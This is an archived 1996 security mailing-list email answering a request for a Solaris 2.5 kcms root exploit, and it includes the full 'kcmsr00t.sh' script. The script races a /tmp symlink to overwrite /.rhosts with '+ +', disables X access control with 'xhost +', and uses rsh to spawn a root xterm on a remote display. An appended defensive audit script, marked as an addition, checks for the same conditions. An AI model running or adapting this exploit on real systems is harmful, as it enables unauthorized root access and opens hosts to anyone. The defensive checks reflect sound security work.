From emf@mailhost.pls.com  Tue Jul 30 07:43:55 1996
Received: from pls.com (san-marcos.pls.com [192.246.50.151]) by suburbia.net (8.7.4/Proff-950810) with SMTP id HAA18103 for <best-of-security@suburbia.net>; Tue, 30 Jul 1996 07:43:51 +1000
Received: from san-marcos by pls.com (SMI-8.6/SMI-SVR4)
	id RAA21976; Mon, 29 Jul 1996 17:40:05 -0400
Sender: emf@mailhost.pls.com
Message-ID: <31FD2FB3.4A4@pls.com>
Date: Mon, 29 Jul 1996 17:40:04 -0400
From: Erik Fichtner <emf@mailhost.pls.com>
Organization: Systems Administrator, Personal Library Software
X-Mailer: Mozilla 2.0 (X11; U; SunOS 5.3 sun4m)
MIME-Version: 1.0
To: Dave Arthur <arthurd@weasel.acccss.af.mil>
CC: best-of-security@suburbia.net
Subject: Re: BoS: Solaris 2.5 Exploit
References: <199607292034.QAA19312@weasel.acccss.af.mil>
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Dave Arthur wrote:
> 
> Does anyone have the exploit code for the Solaris 2.5 bug:  /usr/openwin/bin/kcms*
> 
> If so, could you send me a copy?
> 
> Dave Arthur
> System Administrator
> ACC Computer Systems Squadron
> arthurd@weasel.acccss.af.mil
> (757) 764-7098


This seems to work better when /.rhosts does not exist, although I was
able to get it working most of the time even when /.rhosts exists.
YMMV.  



--

#!/bin/sh -x
# kcmsr00t.sh - hack root on a solaris 2.5 box
#
# original by JungSeok. Roh  ( beren@cosmos.kaist.ac.kr )
# 
# play-testing, proper thrashing of /.rhosts and "hey, bring up an
# xterm!" by Erik Fichtner (techs@spooge.effluvium.com) and 
# Pat Hess (phess@spooge.effluvium.com)
#
# To Prevent This Script:
# % chmod 755 /usr/openwin/bin/kcms*
#
notbroken=1
DISPLAY="catinthehat:0.0"
export DISPLAY
/usr/openwin/bin/xhost +
#  make sure we're ready to go
/bin/rm -rf /tmp/Kp_kcms_sys.sem
cd /tmp
/bin/ln -s /.rhosts Kp_kcms_sys.sem

/usr/openwin/bin/kcms_calibrate &
echo "Click a window to hack r00t."

while [ $notbroken -eq 1 ]
do

    echo "Change your monitor type."
    /usr/openwin/bin/kcms_configure -o -d $DISPLAY \
        /usr/openwin/share/etc/devdata/profiles/kcmsEKsony20.mon

    if [ -f /.rhosts ]; then
            /bin/cp /dev/null /.rhosts
            /bin/echo  "+ +" >> /.rhosts
            /usr/bin/rsh localhost -l root \
                "( /usr/openwin/bin/xterm -display $DISPLAY -fn 12x24 & )"
            notbroken=0
    fi

done
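As an added example from the defender's side (not part of Erik's post), the helpers below audit a host for the three conditions the script above depends on: setuid kcms* binaries (the "chmod 755" fix from the header), a "+ +" wildcard in /.rhosts, and a symlinked Kp_kcms_sys.sem in /tmp. Paths are passed as arguments so the checks can be exercised on a constructed sample tree; the function names and that sample tree are my own.

```shell
#!/bin/sh
# Added audit helpers for the kcms_configure / .rhosts issue discussed
# above; not part of the original post. The functions take paths as
# arguments so they can be exercised on the constructed tree below.

# Print every setuid file named kcms* in a directory; succeed if any found.
find_setuid_kcms() {
    found=1
    for f in "$1"/kcms*; do
        [ -f "$f" ] && [ -u "$f" ] && { echo "$f"; found=0; }
    done
    return $found
}

# Succeed if an rhosts-style file holds a "+ +" wildcard (trust everyone).
rhosts_is_wide_open() {
    [ -f "$1" ] && grep -q '^[[:space:]]*+[[:space:]]*+[[:space:]]*$' "$1"
}

# Succeed if the kcms semaphore in the given tmp dir is a symbolic link.
kcms_sem_is_symlink() {
    [ -L "$1/Kp_kcms_sys.sem" ]
}

# Run all three checks; return 0 when nothing was found, 1 otherwise.
# Usage: run_audit BINDIR RHOSTS_FILE TMPDIR  (e.g. /usr/openwin/bin /.rhosts /tmp)
run_audit() {
    clean=0
    find_setuid_kcms "$1" && { echo "setuid kcms binaries present; chmod 755 them"; clean=1; }
    rhosts_is_wide_open "$2" && { echo "$2 trusts every host and user"; clean=1; }
    kcms_sem_is_symlink "$3" && { echo "$3/Kp_kcms_sys.sem is a symlink"; clean=1; }
    return $clean
}

# Build a constructed sample tree (not a real system) and print its path.
build_sample() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/bin" "$root/tmp"
    : > "$root/bin/kcms_configure" && chmod 4755 "$root/bin/kcms_configure"
    : > "$root/bin/kcms_calibrate" && chmod 755 "$root/bin/kcms_calibrate"
    printf '+ +\n' > "$root/rhosts.bad"
    printf 'host.example.com alice\n' > "$root/rhosts.ok"
    ln -s "$root/rhosts.bad" "$root/tmp/Kp_kcms_sys.sem"
    echo "$root"
}
```

On a real Solaris box the call would be `run_audit /usr/openwin/bin /.rhosts /tmp`; a non-zero return means at least one of the conditions is present.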

